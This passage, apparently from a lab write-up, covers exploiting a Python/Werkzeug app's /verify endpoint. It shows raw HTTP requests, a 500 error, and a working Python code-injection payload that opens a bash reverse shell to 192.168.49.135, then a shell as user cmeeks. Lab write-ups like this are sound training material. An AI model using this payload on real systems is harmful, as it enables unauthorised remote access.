Exploitation

Code Injection

The /verify directory seems to imply that there is a parameter called "code" that we can use to probably execute commands.

Let’s us try to send a POST request against the directory /verify and the body request is filled with the code parameter.

The payload might look as following:

POST /verify HTTP/1.1
Host: 192.168.101.117:50000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: _register_hetemit_session=GK6KJri2ylafDgK%2F6lIyUBw9ZFUG2JwfR2XUy%2Be%2BBxow52YsWOyvti%2FQ4YVuCMMzuGNZB%2FMy4NXQxqDQ%2FeNGm5IQFQW7f94Ou4PByd3u2B7pqfMazR0jVFdSF5vBSV4vUo0J5ZT%2FhHql%2BaR5TKp%2BAnKBITheUGIE7AHyAEbvc%2B5KeSFsQ5mdZrJz46COTOZXBdmvfLlMIEisXpzZPwA3uTow5ziDY54D2MrJDVtpCFQ5YWqaEZeSb0js5JggvLZF7K26sxfSr17MsEphdt%2FopNZxNR4kckDId5%2FsUV9Yla%2Bc--0LA3avph4XEwY4vn--zaptbla4hpI7tLNc87OpLw%3D%3D
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 8

code=whoami

After the request was sent, we can further inspect response.

Here is the response.

HTTP/1.0 500 INTERNAL SERVER ERROR
Content-Type: text/html; charset=utf-8
Content-Length: 290
Server: Werkzeug/1.0.1 Python/3.6.8
Date: Fri, 20 Aug 2021 05:01:07 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">
<title>500 Internal Server Error</title>
<h1>Internal Server Error</h1>
<p>The server encountered an internal error and was unable to complete your request. Either the server is overloaded or there is an error in the application.</p>

The response code 500 INTERNAL SERVER ERROR indicates that something is wrong at the backend. At this point, we fully comprehend that the server does not sanitize our input properly, which ends up our entry breaking something up at the other end.

So werksbeurg whatever is a python based application so if we instead in the code parameter we could possibly try to inject python code and receive a reverse shell like so:

POST /verify HTTP/1.1
Host: 192.168.135.117:50000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Cookie: _register_hetemit_session=i3LCbUrypmdG9OcuyyPoopRsAJoYUvJZJ7Ao629aKWO9TOz%2FPXogNuURVQknBTLGZE2auMwJQU2zLazwm%2FUU857KkNKSNHFat%2BiJUjWlRnLd%2FiRfAw8SfM6flojZf2JWCPsdYjTOgEJo%2BB6MxQJKvHywtnfGoi3xQw5TDJeeIttDKEpHNpVA2yfcdqVCQGZYI0ta3aOqbyfO%2BHOvVvgGfcXQvaWjiQ7EyzCSGM6awUbWEdbP2xDWg8v9nj2j1H%2FaoHavuFuvykCMzAWLhlqHAeDmlcpSHTwqWZxb%2Bj2F4dFJ--%2FZT%2BQu5bm7cflrjk--frmYurXk5lbvi246tVKQDg%3D%3D
Upgrade-Insecure-Requests: 1
Sec-GPC: 1
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

code=__import__("os").system("bash+-c+'bash+-i+>%26+/dev/tcp/192.168.49.135/80+0>%261'")

__import__("os").system("bash+-c+'bash+-i+>%26+/dev/tcp/192.168.49.101/80+0>%261'")

And we get a reverse shell as cmeeks.

PreviousSMBNextPriv Escalation

Last updated